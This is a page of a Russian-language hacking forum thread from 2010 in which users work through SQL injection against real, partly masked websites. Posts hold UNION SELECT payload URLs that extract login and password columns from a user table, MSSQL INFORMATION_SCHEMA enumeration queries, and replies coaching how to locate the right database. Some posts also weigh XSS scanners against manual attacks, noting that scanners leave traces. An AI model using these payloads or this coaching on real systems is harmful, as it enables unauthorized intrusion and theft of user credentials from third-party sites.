Вопросы по уязвимостям - Страница 13

BRO · 28.07.2010, 22:59

Лично я использую тулзу от Пашкелы(перебор)- не знаю что может быть лучше. Другие способы поиска админки - роботс.тхт редки, а нагуглить ее через site: еще реже можно.

UPD

Возник вопрос походу инъекции.
При запросе
(SELECT+TOP+1+COLUMN_NAME+FROM+INFORMATION_SCHEMA. COLUMNS+WHERE+TABLE_NAME=(*имя_таблицы в char*))--

Сервер тупо отдает белую страницу. Т.е. вообще ничего не отдает)

Пробовал запросы

(SELECT+TOP+1+COLUMN_NAME+FROM+INFORMATION_SCHEMA. COLUMNS+WHERE+TABLE_NAME='hex')--
(SELECT+TOP+1+COLUMN_NAME+FROM+INFORMATION_SCHEMA. COLUMNS+WHERE+TABLE_NAME='table_name')--

Отвечает с ошибками
Incorrect syntax near '0xzazazaza' и Incorrect syntax near 'table_name' соответственно.

При запросе SELECT+TOP+1+column_name+from+table_name)-- (Когда таблица и колонка существуют)- отдает данные из этой колонки

Как можно обойти или тут без вариантов?
@@version= Microsoft SQL Server 2005 - 9.00.4207.00 (Intel X86)
Спасибо.

nomad · 29.07.2010, 10:24

Цитата:

Сообщение от BRO

TABLE_NAME='hex')

Возможно, синтаксис на MSSql отличается, но я хекс в кавычки не беру, когда кручу инъекцию на MySql, т.е. для таблицы admin запрос выглядит как

Код:

+where+table_name=0x61646d696e

Lie to Me · 30.07.2010, 22:15

Нашёл ошибку на сайте, подобрал таблицы всё, при попытке получить данные запросом:

http://www.********/price/index.php?id_parent=1%20union%20select%201,2,3,4,5 ,concat_ws(0x3a,user,pass),7,8,9,10,11,12,13+from+ 0x757365726c697374+limit+0,1--+

либо:
http://www.********/price/index.php?id_parent=1%20union%20select%201,2,3,4,5 ,concat_ws(0x3a,user,pass),7,8,9,10,11,12,13+from+ userlist+limit+0,1--+

либо:
http://******/price/index.php?id_parent=1%20union%20select%201,2,3,4,5 ,concat_ws%28
0x3a,user,pass%29,7,8,9,10,11,12,13 from 0x757365726c697374 0,1--+

получаю ошибку:

Код:

Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/****/www/price/price.php on line 52

Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/***/www/price/price.php on line 79

как вытащить данные? при этом все таблицы, колонки выводит, ошибка возникает только при выводе логина и пароля.
то что в таблице userlist есть user,pass точно.

Gorev · 30.07.2010, 22:44

Цитата:

Сообщение от Lie to Me

Нашёл ошибку на сайте, подобрал таблицы всё, при попытке получить данные запросом:

http://www.********/price/index.php?id_parent=1%20union%20select%201,2,3,4,5 ,concat_ws(0x3a,user,pass),7,8,9,10,11,12,13+from+ 0x757365726c697374+limit+0,1--+

либо:
http://www.********/price/index.php?id_parent=1%20union%20select%201,2,3,4,5 ,concat_ws(0x3a,user,pass),7,8,9,10,11,12,13+from+ userlist+limit+0,1--+

либо:
http://******/price/index.php?id_parent=1%20union%20select%201,2,3,4,5 ,concat_ws%28
0x3a,user,pass%29,7,8,9,10,11,12,13 from 0x757365726c697374 0,1--+

получаю ошибку:

Код:

Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/****/www/price/price.php on line 52

Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/***/www/price/price.php on line 79

как вытащить данные? при этом все таблицы, колонки выводит, ошибка возникает только при выводе логина и пароля.
то что в таблице userlist есть user,pass точно.

Вариантов два
Первый: таблица пустая
Проверяется это элементарно, например так:
union+select+1,2,count(*),4+from+user
count(*) выводит количество записей в таблице, если вывело 0, таблица пустая
либо для 5 ветки так
union+select+1,table_rows+from+information_schema. tables+where+table_name='sasasa'
Второй: Таблица в другой базе.
В базе information_schema хранится информация обо всех таблицах и столбцах из всех баз, и есть вероятность того, что ваша таблица находится не в той базе с которой работает скрипт
Проверяется так(5 ветка)
table_schema+from+information_schema.tables+where+ table_name='user', а база с которой работает скрипт выводится database(). Если базы разные, пробуем обратится к той которая нужна
union+select+1,2,count(*),4+from+base.user "By Jokester"

SulikoshkA · 31.07.2010, 00:26

какими лучше сканнерами искать уязвимости ксс
или все таки ручками намного эффиктивнее
к примеру сканнер пробьет все страницы за раз а человек нет

какой сканер посоветуйте который реально что то находит
спс за внимание)

root_sashok · 31.07.2010, 01:37

Если у тебя Firefox, то в нём есть удобный аддон для поиска XSS и пробега множественными типами атак по всем полям сайта / страницы.

Pashkela · 31.07.2010, 01:54

Цитата:

или все таки ручками намного эффиктивнее
к примеру сканнер пробьет все страницы за раз а человек нет

в том то и дело - круче живого человека никто ничего не пробьет. Пока нет скайнета. Кгб-ы очевидные вещи вроде-бы. Полагаясь на средства автоматизации (любые) - сушите мозг. Имхо.

PS: И результат соответственный. То бишь малоэффективный.

Qwazar · 31.07.2010, 02:45

Сканнер и следов оставит как стадо мамонтов, и найдёт на порядок меньше, чем человек.

Lie to Me · 31.07.2010, 03:03

Цитата:

Сообщение от Gorev

Вариантов два
Первый: таблица пустая
Проверяется это элементарно, например так:
union+select+1,2,count(*),4+from+user
count(*) выводит количество записей в таблице, если вывело 0, таблица пустая
либо для 5 ветки так
union+select+1,table_rows+from+information_schema. tables+where+table_name='sasasa'
Второй: Таблица в другой базе.
В базе information_schema хранится информация обо всех таблицах и столбцах из всех баз, и есть вероятность того, что ваша таблица находится не в той базе с которой работает скрипт
Проверяется так(5 ветка)
table_schema+from+information_schema.tables+where+ table_name='user', а база с которой работает скрипт выводится database(). Если базы разные, пробуем обратится к той которая нужна
union+select+1,2,count(*),4+from+base.user "By Jokester"

из первого варианта ( union+select+1,2,count(*),4+from+user ) выводит всё ту же ошибку.
второй если честно не понял, не можешь полный запрос показать с учётом моего урла *интересует
-= Проверяется так(5 ветка)

Цитата:

table_schema+from+information_schema.tables+where+ table_name='user' =-

при таком адресе:
http://*******/price/index.php?id_parent=1%20union%20select%201,2,3,4,5 ,database(),7,8,9,10,11,12,13--+

получаю:
******ru_price

если делать запрос:
http://******/price/index.php?id_parent=1%20union%20select%201,2,3,4,5 ,6,7,8,9,10,11,12,13%20table_schema+from+informati on_schema.tables+where+%20table_name=0x736b7769647 2755f70******--+

то всё нормально, ошибок нет, но при этом и не отображается не одна цифра.

при этом при запросе:
http://******/price/index.php?id_parent=1%20union%20select%201,2,3,4,5 ,6,7,8,9,10,11,12,13%20table_schema+from+informati on_schema.tables+where+%20table_name='****ru_price '--+

всё та же ошибка.

это означает что таблица находится в той базе в которой работает скрипт и если нет, то как посмотреть в какой базе ?.

Спасибо за совет, не скинешь в ПМ жабер, если вдруг не пойму.

root_sashok · 31.07.2010, 04:39

Цитата:

это означает что таблица находится в той базе в которой работает скрипт и если нет, то как посмотреть в какой базе ?.

information_schema.schemata пробовал смотреть?

30.07.2010, 22:15	#123
Lie to Me Регистрация: 30.07.2010 Сообщений: 5 Репутация: 0	Нашёл ошибку на сайте, подобрал таблицы всё, при попытке получить данные запросом: http://www.******/price/index.php?id_parent=1%20union%20select%201,2,3,4,5 ,concat_ws(0x3a,user,pass),7,8,9,10,11,12,13+from+ 0x757365726c697374+limit+0,1--+ либо: http://www.****/price/index.php?id_parent=1%20union%20select%201,2,3,4,5 ,concat_ws(0x3a,user,pass),7,8,9,10,11,12,13+from+ userlist+limit+0,1--+ либо: http://**/price/index.php?id_parent=1%20union%20select%201,2,3,4,5 ,concat_ws%28 0x3a,user,pass%29,7,8,9,10,11,12,13 from 0x757365726c697374 0,1--+ получаю ошибку: Код: Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home//www/price/price.php on line 52 Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home//www/price/price.php on line 79 как вытащить данные? при этом все таблицы, колонки выводит, ошибка возникает только при выводе логина и пароля. то что в таблице userlist* есть user,pass точно.

31.07.2010, 02:45	#128
Qwazar Регистрация: 09.07.2010 Сообщений: 376 Репутация: 154	Сканнер и следов оставит как стадо мамонтов, и найдёт на порядок меньше, чем человек. __________________ Мой блог: http://qwazar.ru/.

Опции темы	Поиск в этой теме
Версия для печати Отправить по электронной почте	Поиск в этой теме: Расширенный поиск
Опции просмотра
Линейный вид Комбинированный вид Древовидный вид

28.07.2010, 22:59	#121
BRO Регистрация: 15.07.2010 Сообщений: 49 Репутация: 0	Лично я использую тулзу от Пашкелы(перебор)- не знаю что может быть лучше. Другие способы поиска админки - роботс.тхт редки, а нагуглить ее через site: еще реже можно. UPD Возник вопрос походу инъекции. При запросе (SELECT+TOP+1+COLUMN_NAME+FROM+INFORMATION_SCHEMA. COLUMNS+WHERE+TABLE_NAME=(имя_таблицы в char))-- Сервер тупо отдает белую страницу. Т.е. вообще ничего не отдает) Пробовал запросы (SELECT+TOP+1+COLUMN_NAME+FROM+INFORMATION_SCHEMA. COLUMNS+WHERE+TABLE_NAME='hex')-- (SELECT+TOP+1+COLUMN_NAME+FROM+INFORMATION_SCHEMA. COLUMNS+WHERE+TABLE_NAME='table_name')-- Отвечает с ошибками Incorrect syntax near '0xzazazaza' и Incorrect syntax near 'table_name' соответственно. При запросе SELECT+TOP+1+column_name+from+table_name)-- (Когда таблица и колонка существуют)- отдает данные из этой колонки Как можно обойти или тут без вариантов? @@version= Microsoft SQL Server 2005 - 9.00.4207.00 (Intel X86) Спасибо.

31.07.2010, 00:26	#125
SulikoshkA Регистрация: 22.07.2010 Сообщений: 5 Репутация: 0	какими лучше сканнерами искать уязвимости ксс или все таки ручками намного эффиктивнее к примеру сканнер пробьет все страницы за раз а человек нет какой сканер посоветуйте который реально что то находит спс за внимание)

31.07.2010, 01:37	#126
root_sashok Регистрация: 05.07.2010 Сообщений: 44 Репутация: 5	Если у тебя Firefox, то в нём есть удобный аддон для поиска XSS и пробега множественными типами атак по всем полям сайта / страницы.